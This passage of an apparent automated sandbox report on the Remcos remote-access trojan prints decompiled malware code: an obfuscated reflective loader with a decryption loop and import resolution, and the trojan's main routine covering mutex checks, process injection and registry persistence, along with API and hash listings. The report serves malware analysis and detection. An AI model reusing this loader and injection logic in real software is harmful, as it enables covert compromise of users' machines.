				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr* _v116;
				struct HINSTANCE__* _v120;
				struct HINSTANCE__* _v124;
				struct HINSTANCE__* _v128;
				char _v136;
				char _v140;
				intOrPtr _v148;
				char _v160;
				intOrPtr _v380;
				intOrPtr _v428;
				intOrPtr _v468;
				char _v508;
				void* __ebp;
				signed int _t111;
				void* _t114;
				struct HINSTANCE__* _t116;
				void* _t121;
				void* _t122;
				void* _t127;
				intOrPtr _t129;
				intOrPtr* _t131;
				void* _t134;
				void* _t138;
				void* _t142;
				intOrPtr _t146;
				void* _t151;
				unsigned int _t153;
				void* _t155;
				void* _t156;
				unsigned int _t158;
				struct HINSTANCE__* _t161;
				intOrPtr _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				intOrPtr _t167;
				intOrPtr* _t168;
				signed int _t190;
				signed int _t200;
				long _t202;
				void* _t203;
				signed int _t208;
				void* _t210;
				intOrPtr _t214;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t226;
				unsigned int _t228;
				intOrPtr _t231;
				void* _t232;
				signed int _t233;
				signed int _t236;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t257;
				void* _t260;
				intOrPtr _t263;
				void* _t264;
				void* _t265;
				struct HINSTANCE__* _t267;
				void* _t277;
				void* _t278;
				void* _t280;
				intOrPtr* _t281;
				intOrPtr* _t283;
				void* _t284;
				intOrPtr* _t287;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;

				_v84 = __eax & 0xffff0000;
				_push(_a4);
				_pop(_t224);
				_t225 = _t224 + 0x72a84;
				_t111 = 0x72a84;
				_t242 = 0x1cf51641;
				do {
					_t111 = _t111 - 4;
					_t225 = _t225 - 4;
					asm("bswap ecx");
					_t244 = _t242 - 0x584ddde1;
					asm("bswap ecx");
					asm("ror ecx, 0xb5");
					asm("rol ecx, 0x36");
					_t245 = _t244 - 0x39568f98;
					_t190 =  !((( ~(( *_t225 + _t242 + _t111 - 0x77996225 + _t111 ^ 0xd7e05cc3) + _t111 - _t244) + _t244 ^ _t244) + _t244 + _t244 ^ _t244 ^ 0x834971f6 ^ _t245) - _t111 + _t111 ^ 0xffffffff8f6e950c);
					asm("ror ecx, 0x32");
					_t242 = _t245 + 0x40300c3a;
					asm("ror ecx, 0x51");
					asm("ror ecx, 0xe5");
					asm("bswap ecx");
					 *_t225 = ( ~( !((_t190 ^ _t111) + _t111 - 0x69f11a42) ^ _t242) ^ 0x660e251d) - 0x8be7802a;
				} while (_t111 != 0);
				E105914FA(_t111);
				_t114 =  *_a12(_t290, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
				_t291 = _t290 + 0x10;
				_t249 = _t114;
				_t116 =  *_a8(_t114, _t291, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
				_t292 = _t291 + 0x10;
				_t161 = _t116;
				if(_t116 == 0) {
					L62:
					return _t116;
				}
				_t116 =  *_a8(_t249, _t292, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
				_t293 = _t292 + 0x10;
				_v120 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t116 =  *_a8(_t249, _t293, 0x74726956, 0x516c6175, 0x79726575, 0);
				_t294 = _t293 + 0x10;
				_v124 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t116 =  *_a8(_t249, _t294, 0x61427349, 0x61655264, 0x72745064, 0);
				_t295 = _t294 + 0x10;
				_v128 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t250 =  &_v508;
				_t200 = 0x3e;
				memcpy(_t250, _a4 +  *((intOrPtr*)(_a4 + 0x3c)), _t200 << 2);
				_t296 = _t295 + 0xc;
				_t253 = _t250;
				_t121 =  *(_t253 + 0x34);
				_v8 = _t121;
				_t202 =  *(_t253 + 0x50);
				_v12 = _t202;
				_t122 = VirtualAlloc(_t121, _t202, 0x3000, 0x40); // executed
				_t203 = _t202;
				if(_t122 != 0) {
					L8:
					_v16 = _t122;
					_t277 = _a4;
					memcpy(_t122, _t277,  *(_t277 +  *((intOrPtr*)(_t277 + 0x3c)) + 0x54));
					_t297 = _t296 + 0xc;
					_t278 = _t277;
					_t280 = _t278 +  *((intOrPtr*)(_t278 + 0x3c)) + 0xf8;
					do {
						_t257 =  &_v60;
						_t208 = 0xa;
						_t127 = memcpy(_t257, _t280, _t208 << 2);
						_t297 = _t297 + 0xc;
						_t260 = _t257;
						_t226 =  *((intOrPtr*)(_t260 + 0x14));
						if(_t226 != 0) {
							_t127 = memcpy(_v16 +  *((intOrPtr*)(_t260 + 0xc)), _a4 + _t226,  *(_t260 + 0x10));
							_t297 = _t297 + 0xc;
							_t280 = _t280;
						}
					} while (_t127 != 1);
					_t228 = _v16 - _v8;
					if(_t228 == 0) {
						L24:
						_t210 = _v16;
						_v80 = _v80 + _v84;
						_t129 =  *[fs:0x30];
						if(_v72 == 0) {
							 *((intOrPtr*)(_t129 + 8)) = _t210;
						}
						_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0xc)) + 0xc));
						_t281 = _t131;
						while( *((intOrPtr*)(_t131 + 0x18)) != _v84 ||  *((intOrPtr*)(_t131 + 0x1c)) != _v80 ||  *((intOrPtr*)(_t131 + 0x20)) != _v76) {
							if( *_t131 == _t281) {
								L33:
								_t162 = _v380;
								if(_t162 == 0) {
									L46:
									_t163 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
									_v116 = _t163;
									do {
										_t231 =  *((intOrPtr*)(_t163 + 0x18));
										if(_t231 == _v84) {
											goto L60;
										}
										_t134 = _v128(4, _t231);
										_t232 = _t231;
										if(_t134 != 0) {
											goto L60;
										}
										_t263 =  *((intOrPtr*)(_t232 +  *((intOrPtr*)(_t232 + 0x3c)) + 0x80));
										if(_t263 == 0) {
											goto L60;
										}
										_t264 = _t263 + _t232;
										while(1) {
											_push(_t264);
											asm("repe scasd");
											_t265 = 5;
											if(0 == 0) {
												goto L60;
											}
											_t283 =  *((intOrPtr*)(_t265 + 0x10)) +  *((intOrPtr*)(_t163 + 0x18));
											_t138 =  *_t283 - _v84;
											if(_t138 < 0 || _t138 > _v76) {
												L54:
												_t264 = _t265 + 0x14;
												continue;
											} else {
												_v124(_t283,  &_v160, 0x1c);
												_t142 = _v120(_v160, _v148, 4,  &_v140);
												if(_t142 == 0) {
													goto L60;
												}
												_push(_t265);
												while(1) {
													asm("lodsd");
													if(_t142 == 0) {
														break;
													}
													_t142 = _t142 - _v84 + _v16;
													asm("stosd");
												}
												_v120(_v160, _v148, _v140,  &_v136);
												_pop(_t265);
												goto L54;
											}
										}
										L60:
										_t163 =  *_t163;
									} while (_t163 != _v116);
									_t116 = _v468 + _v16;
									goto L62;
								}
								_t284 = _v16;
								_t164 = _t162 + _t284;
								while(1) {
									_t146 =  *((intOrPtr*)(_t164 + 0xc));
									if(_t146 == 0) {
										goto L46;
									}
									_v64 =  *((intOrPtr*)(_t164 + 0x10)) + _t284;
									_t214 =  *_t164;
									if(_t214 == 0) {
										_t214 =  *((intOrPtr*)(_t164 + 0x10));
									}
									_v68 = _t214 + _t284;
									_t116 = LoadLibraryA(_t146 + _t284); // executed
									if(_t116 == 0) {
										goto L62;
									} else {
										_t267 = _t116;
										while(1) {
											_t233 =  *_v68;
											if(_t233 == 0) {
												break;
											}
											if((_t233 & 0x80000000) == 0) {
												_t236 = _t233 + _t284 + 2;
											} else {
												_t236 = _t233 & 0x7fffffff;
											}
											 *_v64 =  *_a8(_t267, _t236);
											_v64 = _v64 + 4;
											_v68 =  &(_v68[1]);
										}
										_t164 = _t164 + 0x14;
										continue;
									}
								}
								goto L46;
							}
							_t131 =  *_t131;
						}
						 *((intOrPtr*)(_t131 + 0x18)) = _t210;
						 *((intOrPtr*)(_t131 + 0x1c)) = _t210 + _v468;
						 *((intOrPtr*)(_t131 + 0x20)) = _v428;
						goto L33;
					}
					_t151 = _v16;
					_t167 =  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t151 + 0x3c)) + 0xa0));
					if(_t167 == 0) {
						goto L24;
					}
					_t168 = _t167 + _t151;
					while( *((intOrPtr*)(_t168 + 4)) != 0) {
						_t153 =  *(_t168 + 8) & 0x0000ffff;
						_t287 = _v16 +  *_t168 + (_t153 & 0x00000fff);
						_t228 = _t228;
						_t155 = (_t153 >> 0xc) - 1;
						if(_t155 != 0) {
							_t156 = _t155 - 1;
							if(_t156 != 0) {
								if(_t156 == 1) {
									 *_t287 =  *_t287 + _t228;
								}
								L23:
								asm("loop 0xffffffce");
								_t168 = _t168 +  *((intOrPtr*)(_t168 + 4));
								continue;
							}
							_t158 = _t228 & 0x0000ffff;
							L20:
							 *_t287 =  *_t287 + _t158;
							goto L23;
						}
						_t158 = _t228 >> 0x10;
						goto L20;
					}
					goto L24;
				}
				_t116 = _t161->i(_t122, _t203, 0x1000, 0x40);
				if(_t116 == 0) {
					goto L62;
				}
				goto L8;
			}

0x105910db
0x105910e3
0x105910e6
0x105910e7
0x105910f2
0x105910f7
0x105910fc
0x105910fc
0x105910ff
0x10591110
0x10591120
0x10591128
0x1059112e
0x10591135
0x10591142
0x10591166
0x1059116e
0x10591171
0x10591177
0x1059117e
0x10591193
0x1059119b
0x1059119d
0x105911a5
0x105911bf
0x105911c1
0x105911c4
0x105911dc
0x105911de
0x105911e1
0x105911e5
0x105914f0
0x105914f7
0x105914f7
0x10591204
0x10591206
0x10591209
0x1059120e
0x00000000
0x00000000
0x1059122a
0x1059122c
0x1059122f
0x10591234
0x00000000
0x00000000
0x10591250
0x10591252
0x10591255
0x1059125a
0x00000000
0x00000000
0x10591260
0x1059126f
0x10591270
0x10591270
0x10591272
0x10591273
0x10591276
0x10591279
0x1059127c
0x10591289
0x1059128b
0x1059128e
0x105912a3
0x105912a3
0x105912a8
0x105912b4
0x105912b4
0x105912b6
0x105912ba
0x105912ca
0x105912ca
0x105912d0
0x105912d1
0x105912d1
0x105912d3
0x105912d4
0x105912d9
0x105912ec
0x105912ec
0x105912ee
0x105912ee
0x105912ef
0x105912f5
0x105912f8
0x10591356
0x10591356
0x1059135c
0x1059135f
0x1059136a
0x1059136c
0x1059136c
0x10591372
0x10591375
0x10591377
0x105913a8
0x105913ae
0x105913ae
0x105913b6
0x10591424
0x1059142e
0x10591431
0x10591434
0x10591434
0x1059143a
0x00000000
0x00000000
0x10591444
0x10591447
0x1059144a
0x00000000
0x00000000
0x10591455
0x1059145d
0x00000000
0x00000000
0x1059145f
0x10591461
0x10591463
0x10591467
0x10591469
0x1059146a
0x00000000
0x00000000
0x1059146f
0x10591474
0x10591477
0x1059147e
0x1059147e
0x00000000
0x10591483
0x1059148d
0x105914a5
0x105914aa
0x00000000
0x00000000
0x105914ac
0x105914af
0x105914af
0x105914b2
0x00000000
0x00000000
0x105914b7
0x105914ba
0x105914ba
0x105914d6
0x105914d9
0x00000000
0x105914d9
0x10591477
0x105914dc
0x105914dc
0x105914de
0x105914ed
0x00000000
0x105914ed
0x105913b8
0x105913bb
0x105913bd
0x105913bd
0x105913c2
0x00000000
0x00000000
0x105913c9
0x105913cc
0x105913d0
0x105913d2
0x105913d2
0x105913d7
0x105913e0
0x105913e4
0x00000000
0x105913ea
0x105913ea
0x105913ec
0x105913ef
0x105913f3
0x00000000
0x00000000
0x105913fb
0x10591408
0x105913fd
0x105913fd
0x105913fd
0x10591413
0x10591415
0x10591419
0x10591419
0x1059141f
0x00000000
0x1059141f
0x105913e4
0x00000000
0x105913bd
0x105913aa
0x105913aa
0x1059138f
0x10591398
0x105913a1
0x00000000
0x105913a1
0x105912fa
0x10591302
0x1059130a
0x00000000
0x00000000
0x1059130c
0x1059130e
0x1059131d
0x10591330
0x10591332
0x10591333
0x10591334
0x1059133d
0x1059133e
0x10591349
0x1059134b
0x1059134b
0x1059134d
0x1059134f
0x10591351
0x00000000
0x10591351
0x10591340
0x10591343
0x10591343
0x00000000
0x10591343
0x10591338
0x00000000
0x10591338
0x00000000
0x1059130e
0x10591299
0x1059129d
0x00000000
0x00000000
0x00000000

APIs

VirtualAlloc.KERNELBASE(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 10591289
LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105913E0

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 91612ef8628ab45ef9bd95fb15bbb0cb87fa6bd3e56b60e267764787eebbf80b
Instruction ID: e925c2e85578e2ed750717b7fb8f1fa13ee47476d884b96456065fc843aa7c24
Opcode Fuzzy Hash: 91612ef8628ab45ef9bd95fb15bbb0cb87fa6bd3e56b60e267764787eebbf80b
Instruction Fuzzy Hash: CBD1AF71A00215AFDF58CF69CC84BAEBBB5FF84350F15816DE809AB695DB30E901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9E, Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98

Uniqueness

Uniqueness Score: -1.00%

Function 00422251, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0042225C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8B9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t160;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x46bd28 = _a4;
				_push(_t268);
				E0040CC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
				_t496 = _t495 - 0x18;
				E004020EC(_t268, _t496, __edx, __eflags,  &_v728); // executed
				_t71 = E00417478( &_v756, __edx);
				_t497 = _t496 + 0x30;
				E0040D458(__edx, _t71);
				E00401E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x46c578;
					__eflags =  *((char*)(E00401F95(E00401E49(0x46c578, _t444, __eflags, 3))));
					 *0x46bb01 = __eflags != 0;
					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, E00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t471 = 0x46c518;
					E00401FD1(0x46c518, _t77, 0x46c518, _t78);
					E00401FC7();
					E00401FC7();
					E00405A0B(_t268, 0x46c5cc, "Exe");
					_t269 = 0;
					E00401E49(0x46c578, _t77, __eflags, 0x32);
					__eflags =  *(E00405220(0));
					 *0x46bd4e = __eflags != 0;
					E00401E49(0x46c578, _t77, __eflags, 0x33);
					_t86 = E00405220(0);
					__eflags =  *_t86;
					 *0x46bd4f =  *_t86 != 0;
					__eflags =  *0x46bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = E00401F95(0x46c518); // executed
						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = E00401F95(0x46c518);
							E00410CE2(_t259, __eflags, "Inj");
						}
						E00401FAD(0x46c548, E00401E49(_t461, _t447, __eflags, 0xe));
						_t93 = E00401F95(0x46c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E00401FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0040CD09();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\DpiScaling.exe", 0x104);
							_t100 = E00417614(0x46c548);
							_push(0x46c548);
							_t448 = 0x80000002;
							 *0x46beb4 = _t100;
							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t499 = _t497 + 0xc;
							E00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
							E00401FC7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E00405A02(_t272, 0x46c5b4, _t462);
							_t105 =  *0x46bd20;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46a9d0 =  *_t105();
							}
							_t477 = 0x46c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = E00401E49(0x46c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(E00401F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x46bd20 - _t462; // 0x7536e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t462; // 0x1
										if(__eflags == 0) {
											_t448 = E00401F95(0x46c518);
											_t254 = E0041083B(0x46c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												E00405F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E0040A713() - 0xffffffff;
											if(__eflags == 0) {
												E00406071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D3F7();
							}
							E00409DC9(_t272, 0x46c4e8, E00401F95(E00401E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 4))));
							 *0x46bb02 = __eflags != 0;
							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 5))));
							 *0x46bafb = __eflags != 0;
							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 8))));
							 *0x46bb00 = __eflags != 0;
							__eflags =  *((char*)(E00401F95(E00401E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = E00401F95(E00401E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = E00401F95(E00401E49(_t477, _t448, __eflags, 9));
									_t246 = E00401F95(E00401E49(0x46c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									E00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
									E00401EF0();
									_t477 = 0x46c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								E00431F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00402489();
								_t122 = E00401F95(0x46c560);
								_t449 = E00401F95(0x46c518);
								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								E00409DC9(_t272, 0x46c500,  &_v524);
								_t465 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb01;
								if(__eflags == 0) {
									E00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\DpiScaling.exe");
								} else {
									_t229 = E00401F95(E00401E49(_t477, _t448, __eflags, 0x1e));
									_t231 = E00401F95(E00401E49(_t477, _t448, __eflags, 0xc));
									_t233 = E00401F95(E00401E49(0x46c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x46c578;
									_t235 = E00401F95(E00401E49(0x46c578, _t448,  *_t231, 0xa));
									E0040A987( *_t233, E00401F95(E00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00402489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									E00431F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = E00401EEB(0x46c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00402489();
								_t216 = E00401F95(0x46c560);
								_t217 = E00402489();
								E00410C80(E00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
								E0042F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x46c578;
								E00401E49(0x46c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = E0040EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = E00401F95(E00401E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00402084(_t272, _t502, _t129);
									_push("licence");
									_t450 = E00401F95(0x46c518); // executed
									E00410AA7(0x46c518, _t131); // executed
									_t497 = _t502 + 0x20;
									_t135 = E00436769(_t133, E00401F95(E00401E49(_t465, _t131, __eflags, 0x28)));
									 *0x46bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										E00418F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0, E00418D28, 0, 0, 0);
									}
									_t137 = E00401F95(E00401E49(_t465, _t450, __eflags, 0x37));
									_t139 = E00401F95(E00401E49(_t465, _t450, __eflags, 0x10));
									_t141 = E00401F95(E00401E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x46c578;
									_t144 = E00436769(_t142, E00401F95(E00401E49(0x46c578, _t450,  *_t137, 0x36)));
									_t146 = E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x11));
									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = E00401E49(0x46c578, _t450, __eflags, 0x35);
										_t203 = E00401F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, E00415938, _t485, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = E00401E49(0x46c578, _t450, __eflags, 0x35);
										_t196 = E00401F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, E00415938, _t484, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t185 = E00401F95(E00401E49(_t471, _t450, __eflags, 0x25));
										_t187 = E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										E00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
										E00401EF0();
										__eflags = 0;
										CreateThread(0, 0, E00401BCD, 0, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(E00401F95(E00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = E00401F95(E00401E49(_t471, _t450, __eflags, 0x2c));
										_t182 = E00436769(_t180, E00401F95(E00401E49(0x46c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										E0040A679(_t182);
									}
									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
									E00401EFA(0x46c584, _t450, _t471, _t160);
									_t360 =  &_v776;
									E00401EF0();
									_t163 =  *0x46bd14;
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0); // executed
									}
									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t269, _t269, E0040FAC7, _t269, _t269, _t269);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
